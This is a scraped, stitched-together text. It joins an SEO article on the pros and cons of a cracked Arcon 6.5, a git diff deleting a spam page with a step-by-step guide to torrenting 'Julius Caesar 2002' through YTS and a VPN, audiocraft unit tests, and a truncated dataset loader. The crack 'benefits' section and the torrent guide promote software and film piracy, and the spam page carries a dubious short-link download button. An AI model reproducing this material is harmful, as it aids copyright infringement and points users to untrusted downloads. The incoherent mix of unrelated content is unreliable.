      Using a cracked version of Arcon 6.5 may seem like a good idea at first glance, as it may offer some advantages over using the licensed or trial version of the software. However, using a cracked version of Arcon 6.5 also comes with some disadvantages that may outweigh the advantages in the long run.

      -

      Therefore, it is important to weigh the pros and cons of using a cracked version of Arcon 6.5 before deciding whether to download it or not.

      -

      The benefits of using a cracked version of Arcon 6.5

      -

      Some of the benefits of using a cracked version of Arcon 6.5 are:

      -

      Saving money on license fees

      -

      One of the obvious benefits of using a cracked version of Arcon 6.5 is saving money on license fees. As mentioned earlier, the full version of Arcon 6.5 costs around $1,000 USD, which is a significant amount of money for many users. By using a cracked version of Arcon 6.5, users can avoid paying this fee and save money for other purposes.

      -

      For example, if a user needs to use Arcon 6.5 for a one-time project that lasts for a month, they may not want to pay $1,000 USD for a software license that they will not use again. By using a cracked version of Arcon 6.5, they can save $1,000 USD and use it for other expenses, such as materials, equipment, labor, or marketing.

      -

      Similarly, if a user wants to use Arcon 6.5 for personal or hobby purposes, they may not have the budget or the willingness to pay $1,000 USD for a software license that they will use occasionally. By using a cracked version of Arcon 6.5, they can save $1,000 USD and use it for other hobbies, such as travel, gaming, or entertainment.

      -

      Enjoying unlimited access to all features and updates

      -

      Another benefit of using a cracked version of Arcon 6.5 is enjoying unlimited access to all features and updates of the software. As mentioned earlier, the trial version and the older versions of Arcon 6.5 have many limitations and restrictions that prevent users from fully experiencing the features and functions of the software. Some features and updates are exclusive to the full version or the latest version of Arcon 6.5.

      -

      By using a cracked version of Arcon 6.5, users can bypass these limitations and restrictions and use all features and updates of the software without any problems. They can create any type of architectural project with any level of complexity and detail. They can also customize their design according to their preferences and requirements.

      -

      For example, if a user wants to create a curved wall in their project, they may not be able to do so with the trial version or the older versions of Arcon 6.5, as this feature is only available in the full version or the latest version of Arcon 6.5. By using a cracked version of Arcon 6.5, they can create a curved wall with ease and accuracy.

      -

      Similarly, if a user wants to export their project in a specific CAD or BIM format, such as OBJ or STL, they may not be able to do so with the trial version or the older versions of Arcon 6.5, as this feature is only available in the full version or the latest version of Arcon 6.5. By using a cracked version of Arcon 6.5, they can export their project in any format they want.

      -

      Exploring different versions and modules of Arcon 6.5

      -

      A third benefit of using a cracked version of Arcon 6.5 is exploring different versions and modules of the software. As mentioned earlier, Arcon 6.5 is part of the Arcon Evo series, which is the latest generation of Arcon software. However, there are also older versions of Arcon software, such as Arcon 5.0, Arcon 4.0, Arcon 3.0, and more. Each version of Arcon software has different features and functions that may suit different needs and preferences of users.

      -

      By using a cracked version of Arcon 6.5, users can explore different versions of Arcon software and compare their differences and similarities. They can also switch between different versions of Arcon software without any compatibility issues or data loss.

      -

      For example, if a user wants to use a feature that is only available in an older version of Arcon software, such as a specific object or material, they can use a cracked version of Arcon 6.5 to access that feature without having to install or uninstall different versions of Arcon software.

      -

      Similarly, if a user wants to use a feature that is only available in a newer version of Arcon software, such as a specific rendering or export option, they can use a cracked version of Arcon 6.5 to access that feature without having to upgrade or downgrade their version of Arcon software.

      -

      In addition to different versions of Arcon software, there are also different modules of Arcon software that offer specialized features and functions for specific types of projects, such as:

      -
        -
      • Arcon Landscape Design: A module that allows users to create realistic and detailed landscapes and gardens with plants, trees, flowers, water features, paths, fences, and more
      • -
      • Arcon Kitchen Design: A module that allows users to create custom and functional kitchens with cabinets, countertops, appliances, sinks, faucets, lighting, and more
      • -
      • Arcon Bathroom Design: A module that allows users to create stylish and comfortable bathrooms with bathtubs, showers, toilets, sinks, faucets, mirrors, tiles, and more
      • -
      • Arcon Interior Design: A module that allows users to create cozy and elegant interiors with furniture, fixtures, accessories, carpets, curtains, wallpapers, and more
      • -
      • Arcon Roof Design: A module that allows users to create complex and realistic roofs with different shapes, slopes, materials, windows, skylights, chimneys, and more
      • -
      -

      By using a cracked version of Arcon 6.5, users can explore different modules of Arcon software and use them for their projects without having to buy or install them separately.

      -

      The risks of using a cracked version of Arcon 6.5

      -

      However, using a cracked version of Arcon 6.5 is not without risks. Some of the risks of using a cracked version of Arcon 6.5 are:

      -

      Violating the terms and conditions of Arcon 6.5 license agreement

      -

      One of the obvious risks of using a cracked version of Arcon 6.5 is violating the terms and conditions of the license agreement that users have to accept when they buy or download the software from the official website.

      -

      The license agreement is a legal contract between the user and Elecosoft that defines the rights and obligations of both parties regarding the use of the software. The license agreement states that the user can only use the software for their own personal or professional purposes and cannot distribute, copy, modify, or crack the software without the permission of Elecosoft. The license agreement also states that the user is responsible for any damages or losses that may result from the use of the software and that Elecosoft is not liable for any warranty or support for the software.

      -

      By using a cracked version of Arcon 6.5, users are breaking the license agreement and infringing the intellectual property rights of Elecosoft. This is a serious offense that may result in legal actions and penalties, such as fines, lawsuits, or even criminal charges. Elecosoft may also revoke the user's license and access to the software and any related services or products.

      -

      For example, in 2019, Autodesk, a company that produces software for CAD and BIM applications, such as AutoCAD and Revit, sued several individuals and companies for using cracked versions of their software. Autodesk claimed that these defendants violated their license agreement and caused them significant losses in revenue and reputation. Autodesk sought damages of up to $150,000 USD per infringement and an injunction to stop the defendants from using their software.

      -

      Therefore, using a cracked version of Arcon 6.5 is not worth the risk of facing legal consequences and losing your license and access to the software.

      -

      Exposing your computer to malware and viruses

      -

      Another risk of using a cracked version of Arcon 6.5 is exposing your computer to malware and viruses. As mentioned earlier, some users may have difficulty finding or downloading the trial version of Arcon 6.5 online and may look for alternative ways to download Arcon 6.5 online, such as torrent sites, file-sharing platforms, or crack websites.

      -

      However, these sources are not reliable or trustworthy, as they may contain malicious files or programs that can harm your computer or steal your personal information. These files or programs may be disguised as Arcon 6.5 crack files or activation codes, but they are actually malware or viruses that can infect your computer once you download or run them.

      -

      Some examples of malware or viruses that may come with a cracked version of Arcon 6.5 are:

      -
        -
      • Trojans: A type of malware that can create backdoors in your computer and allow hackers to access your system and data remotely
      • -
      • Ransomware: A type of malware that can encrypt your files and demand a ransom for their decryption
      • -
      • Spyware: A type of malware that can monitor your online activities and collect your personal information, such as passwords, credit card numbers, bank accounts, etc.
      • -
      • Adware: A type of malware that can display unwanted ads on your browser or desktop
      • -
      • Worms: A type of virus that can spread from one computer to another through networks or removable devices
      • -
      • Rootkits: A type of virus that can hide itself from detection and removal by antivirus software
      • -
      -

      These malware or viruses can cause serious problems for your computer, such as slowing down your system, deleting or corrupting your files, crashing your programs, displaying error messages, changing your settings, stealing your identity, extorting your money, or even destroying your hardware.

      -

      For example, in 2017, a ransomware called WannaCry infected millions of computers worldwide, including those of hospitals, banks, schools, and governments. WannaCry encrypted the files of the infected computers and demanded a ransom of $300 USD in Bitcoin for their decryption. WannaCry was spread through a vulnerability in the Windows operating system that was exploited by a leaked NSA hacking tool. Some users who downloaded a cracked version of Windows were among the victims of WannaCry.

      -

      Therefore, using a cracked version of Arcon 6.5 is not worth the risk of exposing your computer to malware and viruses.

      -

      Compromising the quality and performance of Arcon 6.5

      -

      A third risk of using a cracked version of Arcon 6.5 is compromising the quality and performance of the software. As mentioned earlier, Arcon 6.5 is a software that offers many features and functions that make it a powerful and versatile software for architectural design, 3D modeling, and rendering.

      -

      However, a cracked version of Arcon 6.5 may not work properly or cause errors and crashes. This is because a cracked version of Arcon 6.5 may have been modified or tampered with by hackers or crackers who may have introduced bugs, glitches, or defects in the software. A cracked version of Arcon 6.5 may also have been infected with malware or viruses that may interfere with the software's functionality or stability.

      -

      Some examples of problems that may occur with a cracked version of Arcon 6.5 are:

      -
        -
      • The software may not start or run at all
      • -
      • The software may freeze or crash frequently
      • -
      • The software may display error messages or warnings
      • -
      • The software may produce corrupted or distorted output files
      • -
      • The software may not support some features or updates
      • -
      • The software may not be compatible with some CAD or BIM formats
      • -
      • The software may not be able to connect to the internet or cloud storage
      • -
      -

      These problems can affect the quality and performance of Arcon 6.5 and prevent users from completing their projects successfully and efficiently. They can also cause frustration and dissatisfaction for users who expect a smooth and reliable experience with the software.

      -

      For example, if a user wants to create a 3D model of a building with a cracked version of Arcon 6.5, they may encounter problems such as:

      -
        -
      • The software may not be able to generate walls, doors, windows, roofs, stairs, and other elements automatically
      • -
      • The software may not be able to modify the design in real-time
      • -
      • The software may not be able to render the model with realistic images and animations
      • -
      • The software may not be able to export the model in the desired CAD or BIM format
      • -
      • The software may not be able to share the model with other users or clients
      • -
      -

      These problems can result in a poor-quality and incomplete project that does not meet the user's expectations or requirements.

      -

      Therefore, using a cracked version of Arcon 6.5 is not worth the risk of compromising the quality and performance of the software.

      -

      Conclusion: Should You Download Arcon 6.5 Crack?

      -

      In conclusion, downloading Arcon 6.5 crack may seem like a tempting option for some users who want to use the software without paying for it or having any limitations. However, downloading Arcon 6.5 crack also comes with many risks that may outweigh the benefits in the long run.

      -

      Some of the benefits of downloading Arcon 6.5 crack are:

      -
        -
      • Saving money on license fees
      • -
      • Enjoying unlimited access to all features and updates
      • -
      • Exploring different versions and modules of Arcon 6.5
      • -
      -

      Some of the risks of downloading Arcon 6.5 crack are:

      -
        -
      • Violating the terms and conditions of Arcon 6.5 license agreement
      • -
      • Exposing your computer to malware and viruses
      • -
      • Compromising the quality and performance of Arcon 6.5
      • -
      -

      Therefore, we recommend that you do not download Arcon 6.5 crack and instead use the licensed or trial version of the software from the official website. This way, you can avoid legal consequences, protect your computer from threats, and ensure a high-quality and reliable experience with the software.

      -

      If you are interested in using Arcon 6.5 for your architectural projects, you can visit the official website to learn more about the features and functions of the software, download the trial version of the software, or buy the full version of the software. You can also contact Elecosoft for any questions or support regarding the software.

      -

      FAQs about Arcon 6.5 Crack

      -

      Here are some frequently asked questions about Arcon 6.5 crack with brief answers:

      -
        -
      1. What is Arcon 6.5 crack?
      2. -

        Arcon 6.5 crack is a term that refers to a modified or tampered version of Arcon 6.5 software that does not require any license or activation and can be used without any limitations.

        -
      3. Where can I download Arcon 6.5 crack?
      4. -

        There are many sources online that claim to offer Arcon 6.5 crack, such as torrent sites, file-sharing platforms, or crack websites. However, these sources are not reliable or trustworthy, as they may contain malicious files or programs that can harm your computer or steal your personal information.

        -
      5. Is it legal to download Arcon 6.5 crack?
      6. -

        No, it is not legal to download Arcon 6.5 crack, as it violates the terms and conditions of the license agreement that you have to accept when you buy or download the software from the official website. Downloading Arcon 6.5 crack also infringes the intellectual property rights of Elecosoft, the developer of the software. This is a serious offense that may result in legal actions and penalties, such as fines, lawsuits, or even criminal charges.

        -
      7. Is it safe to download Arcon 6.5 crack?
      8. -

        No, it is not safe to download Arcon 6.5 crack, as it exposes your computer to malware and viruses that can harm your computer or steal your personal information. These malware or viruses may be disguised as Arcon 6.5 crack files or activation codes, but they are actually malicious files or programs that can infect your computer once you download or run them.

        -
      9. Is it worth downloading Arcon 6.5 crack?
      10. -

        No, it is not worth downloading Arcon 6.5 crack, as it compromises the quality and performance of the software. A cracked version of Arcon 6.5 may not work properly or cause errors and crashes. This is because a cracked version of Arcon 6.5 may have been modified or tampered with by hackers or crackers who may have introduced bugs, glitches, or defects in the software. A cracked version of Arcon 6.5 may also have been infected with malware or viruses that may interfere with the software's functionality or stability.

        -

      b2dd77e56b
      -
      -
      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Julius Caesar 2002 Torrent 1080p ((EXCLUSIVE)).md b/spaces/stomexserde/gpt4-ui/Examples/Julius Caesar 2002 Torrent 1080p ((EXCLUSIVE)).md deleted file mode 100644 index 4aed84aba3516ddbff11a4eefb1a88983198ca96..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Julius Caesar 2002 Torrent 1080p ((EXCLUSIVE)).md +++ /dev/null @@ -1,28 +0,0 @@ -
      -Here is a possible title and article for the keyword "Julius Caesar 2002 Torrent 1080p": - -

      How to Download Julius Caesar 2002 Torrent 1080p

      -

      If you are a fan of historical dramas, you might be interested in downloading Julius Caesar 2002 torrent 1080p. This is a TV miniseries that depicts the life and death of the famous Roman general and dictator, who shaped the fate of the ancient world. You can watch his campaigns in Gaul and Egypt, his rivalry with Pompey, and his tragic assassination by Brutus and Cassius.

      -

      Julius Caesar 2002 Torrent 1080p


      Downloadhttps://urlgoal.com/2uI6qW



      -

      But where can you find Julius Caesar 2002 torrent 1080p? And how can you download it safely and legally? Here are some tips to help you out.

      -

      Find a Reliable Torrent Site

      -

      The first step is to find a reliable torrent site that offers Julius Caesar 2002 torrent 1080p. There are many torrent sites on the internet, but not all of them are trustworthy or secure. Some may contain malware, viruses, or fake files that can harm your device or compromise your privacy.

      -

      One of the best torrent sites that we recommend is YTS.mx. This site has a large collection of movies and TV shows in high quality and small file size. You can easily find Julius Caesar 2002 torrent 1080p on this site by searching for it in the search bar or browsing through the categories.

      -

      Use a VPN Service

      -

      The next step is to use a VPN service before downloading Julius Caesar 2002 torrent 1080p. A VPN, or virtual private network, is a tool that encrypts your internet traffic and hides your IP address from prying eyes. This way, you can protect your online identity and avoid any legal issues or ISP throttling that may arise from torrenting.

      -

      There are many VPN services available on the market, but not all of them are suitable for torrenting. Some may have slow speeds, limited bandwidth, or poor security features. You need to choose a VPN service that offers fast and unlimited torrenting, strong encryption, and a no-logs policy.

      -

      One of the best VPN services that we recommend is ExpressVPN. This service has over 3000 servers in 94 countries, including many optimized for P2P file sharing. It also has AES-256 encryption, kill switch, split tunneling, and DNS leak protection. You can try ExpressVPN risk-free with its 30-day money-back guarantee.

      -

      Download Julius Caesar 2002 Torrent 1080p

      -

      The final step is to download Julius Caesar 2002 torrent 1080p from YTS.mx using ExpressVPN. Here are the steps to follow:

      -

      -
        -
      1. Download and install ExpressVPN on your device.
      2. -
      3. Connect to a server location where torrenting is legal and safe.
      4. -
      5. Go to YTS.mx and search for Julius Caesar 2002 torrent 1080p.
      6. -
      7. Select the file with the highest quality and seeders.
      8. -
      9. Click on the download button and open the torrent file with your preferred torrent client.
      10. -
      11. Wait for the download to complete and enjoy watching Julius Caesar 2002 in HD.
      12. -
      -

      That's it! You have successfully downloaded Julius Caesar 2002 torrent 1080p. We hope you enjoy this epic historical drama and learn more about one of the most influential figures in history.

      7196e7f11a
      -
      -
      \ No newline at end of file diff --git a/spaces/studiobrn/SplitTrack/tests/modules/test_transformer.py b/spaces/studiobrn/SplitTrack/tests/modules/test_transformer.py deleted file mode 100644 index 8c9953d9e8f139db7b8ce3063e3d5a78d2f5d088..0000000000000000000000000000000000000000 --- a/spaces/studiobrn/SplitTrack/tests/modules/test_transformer.py +++ /dev/null @@ -1,247 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from itertools import product - -import pytest -import torch - -from audiocraft.modules.transformer import StreamingMultiheadAttention, StreamingTransformer - - -def test_transformer_causal_streaming(): - torch.manual_seed(1234) - - for context, custom in product([None, 10], [False, True]): - # Test that causality and receptive fields are properly handled. - # looking at the gradients - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=custom, - dropout=0.) - steps = 20 - for k in [0, 10, 15, 19]: - x = torch.randn(4, steps, 16, requires_grad=True) - y = tr(x) - y[:, k].abs().sum().backward() - if k + 1 < steps: - assert torch.allclose(x.grad[:, k + 1:], torch.tensor(0.)), x.grad[:, k + 1:].norm() - assert not torch.allclose(x.grad[:, :k + 1], torch.tensor(0.)), x.grad[:, :k + 1].norm() - if context is not None and k > context: - limit = k - context - 1 - assert torch.allclose(x.grad[:, :limit], - torch.tensor(0.)), x.grad[:, :limit].norm() - - # Now check that streaming gives the same result at batch eval. - x = torch.randn(4, steps, 16) - y = tr(x) - ys = [] - with tr.streaming(): - for k in range(steps): - chunk = x[:, k:k + 1, :] - ys.append(tr(chunk)) - y_stream = torch.cat(ys, dim=1) - delta = torch.norm(y_stream - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_transformer_vs_pytorch(): - torch.manual_seed(1234) - # Check that in the non causal setting, we get the same result as - # PyTorch Transformer encoder. - for custom in [False, True]: - tr = StreamingTransformer( - 16, 4, 2, - causal=False, custom=custom, dropout=0., positional_scale=0.) - layer = torch.nn.TransformerEncoderLayer(16, 4, dropout=0., batch_first=True) - tr_ref = torch.nn.TransformerEncoder(layer, 2) - tr.load_state_dict(tr_ref.state_dict()) - - x = torch.randn(4, 20, 16) - y = tr(x) - y2 = tr_ref(x) - delta = torch.norm(y2 - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_streaming_api(): - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0.) - tr.eval() - steps = 12 - x = torch.randn(1, steps, 16) - - with torch.no_grad(): - with tr.streaming(): - _ = tr(x[:, :1]) - state = {k: v.clone() for k, v in tr.get_streaming_state().items()} - y = tr(x[:, 1:2]) - tr.set_streaming_state(state) - y2 = tr(x[:, 1:2]) - assert torch.allclose(y, y2), (y - y2).norm() - assert tr.flush() is None - - -def test_memory_efficient(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1) - tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - assert torch.allclose(y, y2), (y - y2).norm() - - -def test_attention_as_float32(): - torch.manual_seed(1234) - cases = [ - {'custom': True}, - {'custom': False}, - ] - for case in cases: - tr = StreamingTransformer(16, 4, 2, dropout=0., dtype=torch.bfloat16, **case) - tr_float32 = StreamingTransformer( - 16, 4, 2, dropout=0., attention_as_float32=True, dtype=torch.bfloat16, **case) - if not case['custom']: - # we are not using autocast here because it doesn't really - # work as expected on CPU, so we have to manually cast the weights of the MHA. - for layer in tr_float32.layers: - layer.self_attn.mha.to(torch.float32) - tr_float32.load_state_dict(tr.state_dict()) - steps = 12 - x = torch.randn(3, steps, 16, dtype=torch.bfloat16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_float32(x) - assert not torch.allclose(y, y2), (y - y2).norm() - - -@torch.no_grad() -def test_streaming_memory_efficient(): - torch.manual_seed(1234) - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0., custom=True) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, causal=True) - tr.load_state_dict(tr_mem_efficient.state_dict()) - tr.eval() - tr_mem_efficient.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr_mem_efficient.streaming(): - outs = [] - # frame_sizes = [2] + [1] * (steps - 2) - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr_mem_efficient(frame)) - - out = torch.cat(outs, dim=1) - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_cross_attention(): - torch.manual_seed(1234) - for norm_first in [True, False]: - m = StreamingTransformer( - 16, 4, 2, cross_attention=False, norm_first=norm_first, dropout=0., custom=True) - m_cross = StreamingTransformer( - 16, 4, 2, cross_attention=True, norm_first=norm_first, dropout=0., custom=True) - m_cross.load_state_dict(m.state_dict(), strict=False) - x = torch.randn(2, 5, 16) - cross_x = torch.randn(2, 3, 16) - y_ref = m(x) - y_cross_zero = m_cross(x, cross_attention_src=0 * cross_x) - # With norm_first, the two should be exactly yhe same, - # but with norm_first=False, we get 2 normalization in a row - # and the epsilon value leads to a tiny change. - atol = 0. if norm_first else 1e-6 - print((y_ref - y_cross_zero).norm() / y_ref.norm()) - assert torch.allclose(y_ref, y_cross_zero, atol=atol) - - # We now expect a difference even with a generous atol of 1e-2. - y_cross = m_cross(x, cross_attention_src=cross_x) - assert not torch.allclose(y_cross, y_cross_zero, atol=1e-2) - - with pytest.raises(AssertionError): - _ = m_cross(x) - _ = m(x, cross_attention_src=cross_x) - - -def test_cross_attention_compat(): - torch.manual_seed(1234) - num_heads = 2 - dim = num_heads * 64 - with pytest.raises(AssertionError): - StreamingMultiheadAttention(dim, num_heads, causal=True, cross_attention=True) - - cross_attn = StreamingMultiheadAttention( - dim, num_heads, dropout=0, cross_attention=True, custom=True) - ref_attn = torch.nn.MultiheadAttention(dim, num_heads, dropout=0, batch_first=True) - - # We can load the regular attention state dict - # so we have compat when loading old checkpoints. - cross_attn.load_state_dict(ref_attn.state_dict()) - - queries = torch.randn(3, 7, dim) - keys = torch.randn(3, 9, dim) - values = torch.randn(3, 9, dim) - - y = cross_attn(queries, keys, values)[0] - y_ref = ref_attn(queries, keys, values)[0] - assert torch.allclose(y, y_ref, atol=1e-7) - - # Now let's check that streaming is working properly. - with cross_attn.streaming(): - ys = [] - for step in range(queries.shape[1]): - ys.append(cross_attn(queries[:, step: step + 1], keys, values)[0]) - y_streaming = torch.cat(ys, dim=1) - assert torch.allclose(y_streaming, y, atol=1e-7) - - -def test_repeat_kv(): - torch.manual_seed(1234) - num_heads = 8 - kv_repeat = 4 - dim = num_heads * 64 - with pytest.raises(AssertionError): - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, cross_attention=True) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, custom=True) - x = torch.randn(4, 18, dim) - y = mha(x, x, x)[0] - assert x.shape == y.shape - - -def test_qk_layer_norm(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, bias_attn=False) - steps = 12 - x = torch.randn(3, steps, 16) - y = tr(x) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, cross_attention=True) - z = torch.randn(3, 21, 16) - y = tr(x, cross_attention_src=z) - assert y.shape == x.shape diff --git a/spaces/subhajitmaji/MusicGen/tests/modules/test_rope.py b/spaces/subhajitmaji/MusicGen/tests/modules/test_rope.py deleted file mode 100644 index 067c6f067acbf27fb0fef5c2b812c22474c4fcd0..0000000000000000000000000000000000000000 --- a/spaces/subhajitmaji/MusicGen/tests/modules/test_rope.py +++ /dev/null @@ -1,168 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import torch - -from audiocraft.modules.rope import RotaryEmbedding -from audiocraft.modules.transformer import StreamingTransformer, set_efficient_attention_backend - - -def test_rope(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope = RotaryEmbedding(dim=C) - xq = torch.rand((B, T, H, C)) - xk = torch.rand((B, T, H, C)) - xq_out, xk_out = rope.rotate_qk(xq, xk, start=7) - - assert list(xq_out.shape) == [B, T, H, C] - assert list(xk_out.shape) == [B, T, H, C] - - -def test_rope_io_dtypes(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope_32 = RotaryEmbedding(dim=C, dtype=torch.float32) - rope_64 = RotaryEmbedding(dim=C, dtype=torch.float64) - - # Test bfloat16 inputs w/ both 32 and 64 precision rope. - xq_16 = torch.rand((B, T, H, C)).to(torch.bfloat16) - xk_16 = torch.rand((B, T, H, C)).to(torch.bfloat16) - xq_out, xk_out = rope_32.rotate_qk(xq_16, xk_16) - assert xq_out.dtype == torch.bfloat16 - xq_out, xk_out = rope_64.rotate_qk(xq_16, xk_16) - assert xq_out.dtype == torch.bfloat16 - - # Test float32 inputs w/ both 32 and 64 precision rope. - xq_32 = torch.rand((B, T, H, C)).to(torch.float32) - xk_32 = torch.rand((B, T, H, C)).to(torch.float32) - xq_out, xk_out = rope_32.rotate_qk(xq_32, xk_32) - assert xq_out.dtype == torch.float32 - xq_out, xk_out = rope_64.rotate_qk(xq_32, xk_32) - assert xq_out.dtype == torch.float32 - - -def test_transformer_with_rope(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - for pos in ['rope', 'sin_rope']: - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1, - positional_embedding=pos) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - out = tr(x) - assert list(out.shape) == list(x.shape) - - -@torch.no_grad() -def test_rope_streaming(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, causal=True, dropout=0., - custom=True, positional_embedding='rope') - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr.streaming(): - outs = [] - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr(frame)) - - out = torch.cat(outs, dim=1) - assert list(out.shape) == [3, steps, 16] - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -@torch.no_grad() -def test_rope_streaming_past_context(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - - for context in [None, 10]: - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=True, - dropout=0., positional_embedding='rope') - tr.eval() - - steps = 20 - x = torch.randn(3, steps, 16) - ref = tr(x) - - with tr.streaming(): - outs = [] - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr(frame)) - - out = torch.cat(outs, dim=1) - assert list(out.shape) == [3, steps, 16] - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_rope_memory_efficient(): - set_efficient_attention_backend('xformers') - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1, - positional_embedding='rope') - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1, - positional_embedding='rope') - tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - # Check at float precision b/c this is the rope default. - assert torch.allclose(y, y2, atol=1e-7), (y - y2).norm() - - -def test_rope_with_xpos(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope = RotaryEmbedding(dim=C, xpos=True) - xq = torch.rand((B, T, H, C)) - xk = torch.rand((B, T, H, C)) - xq_out, xk_out = rope.rotate_qk(xq, xk, start=7) - - assert list(xq_out.shape) == [B, T, H, C] - assert list(xk_out.shape) == [B, T, H, C] - - -def test_positional_scale(): - set_efficient_attention_backend('xformers') - B, T, H, C = 8, 75, 16, 128 - - rope = RotaryEmbedding(dim=C, xpos=True, scale=0.0) - xq = torch.rand((B, T, H, C)) - xk = torch.rand((B, T, H, C)) - xq_out, xk_out = rope.rotate_qk(xq, xk, start=7) - - assert torch.allclose(xq, xq_out) - assert torch.allclose(xk, xk_out) diff --git a/spaces/subhc/Guess-What-Moves/datasets/flow_pair_detectron.py b/spaces/subhc/Guess-What-Moves/datasets/flow_pair_detectron.py deleted file mode 100644 index cac5a4c1b073dbfffc947a13fc369bbeebce871d..0000000000000000000000000000000000000000 --- a/spaces/subhc/Guess-What-Moves/datasets/flow_pair_detectron.py +++ /dev/null @@ -1,275 +0,0 @@ -import math -from pathlib import Path -import random - -import detectron2.data.transforms as DT -import einops -import numpy as np -import torch -import torch.nn.functional as F -import torchvision.transforms as T -from PIL import Image -from detectron2.data import detection_utils as d2_utils -from detectron2.structures import Instances, BitMasks -from torch.utils.data import Dataset - -from utils.data import read_flow, read_flo - - -def load_flow_tensor(path, resize=None, normalize=True, align_corners=True): - """ - Load flow, scale the pixel values according to the resized scale. - If normalize is true, return rescaled in normalized pixel coordinates - where pixel coordinates are in range [-1, 1]. - NOTE: RAFT USES ALIGN_CORNERS=TRUE SO WE NEED TO ACCOUNT FOR THIS - Returns (2, H, W) float32 - """ - flow = read_flo(path).astype(np.float32) - H, W, _ = flow.shape - h, w = (H, W) if resize is None else resize - u, v = flow[..., 0], flow[..., 1] - if normalize: - if align_corners: - u = 2.0 * u / (W - 1) - v = 2.0 * v / (H - 1) - else: - u = 2.0 * u / W - v = 2.0 * v / H - else: - h, w = resize - u = w * u / W - v = h * v / H - - if h != H or w !=W: - u = Image.fromarray(u).resize((w, h), Image.ANTIALIAS) - v = Image.fromarray(v).resize((w, h), Image.ANTIALIAS) - u, v = np.array(u), np.array(v) - return torch.from_numpy(np.stack([u, v], axis=0)) - - -class FlowPairDetectron(Dataset): - def __init__(self, data_dir, resolution, to_rgb=False, size_divisibility=None, enable_photo_aug=False, flow_clip=1., norm=True, read_big=True, force1080p=False, flow_res=None): - self.eval = eval - self.to_rgb = to_rgb - self.data_dir = data_dir - self.flow_dir = {k: [e for e in v if e.shape[0] > 0] for k, v in data_dir[0].items()} - self.flow_dir = {k: v for k, v in self.flow_dir.items() if len(v) > 0} - self.resolution = resolution - self.size_divisibility = size_divisibility - self.ignore_label = -1 - self.transforms = DT.AugmentationList([ - DT.Resize(self.resolution, interp=Image.BICUBIC), - ]) - self.photometric_aug = T.Compose([ - T.RandomApply(torch.nn.ModuleList([T.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.2, hue=0.1)]), - p=0.8), - T.RandomGrayscale(p=0.2), - ]) if enable_photo_aug else None - self.flow_clip=flow_clip - self.norm_flow=norm - self.read_big = read_big - self.force1080p_transforms = None - if force1080p: - self.force1080p_transforms = DT.AugmentationList([ - DT.Resize((1088, 1920), interp=Image.BICUBIC), - ]) - self.big_flow_resolution = flow_res - - def __len__(self): - return sum([cat.shape[0] for cat in next(iter(self.flow_dir.values()))]) if len( - self.flow_dir.values()) > 0 else 0 - - def __getitem__(self, idx): - - dataset_dicts = [] - - random_gap = random.choice(list(self.flow_dir.keys())) - flowgaps = self.flow_dir[random_gap] - vid = random.choice(flowgaps) - flos = random.choice(vid) - dataset_dict = {} - - fname = Path(flos[0]).stem - 